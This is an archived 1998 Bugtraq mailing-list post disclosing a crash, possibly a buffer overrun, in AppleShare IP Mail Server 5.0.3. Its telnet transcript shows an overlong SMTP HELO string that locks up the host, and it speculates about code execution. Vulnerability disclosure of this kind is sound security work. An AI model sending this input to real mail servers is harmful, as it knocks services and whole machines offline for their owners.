X-RDate: Wed, 08 Apr 1998 15:10:23 +0600 (ESD)
Date: Wed, 8 Apr 1998 13:11:17 +1200
From: Chris Wedgwood <chris@CYBERNET.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: AppleShare IP Mail Server
[Yet another buffer overrun? - I hope this isn't getting monotonous]
I noticed this a while back but haven't seen any else mention it.
There appears to be what looks like a buffer overrun problem with AppleShare
IP Mail Server.
If you connect to the SMTP port and issue a long string (say 500 bytes or
so) the server crashes - and because its a Mac, it usually crashed the whole
machine to the point where it needs a reboot.
So far I've only tested against servers which emit the banner 'AppleShare IP
Mail Server 5.0.3'
For example:
$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]
Physically checking the machine shows it has `locked up' and it a reboot. I
assume if you can cause a crash without the lockup then you might be able to
execute code and so something useful (on a Mac?).
-cw
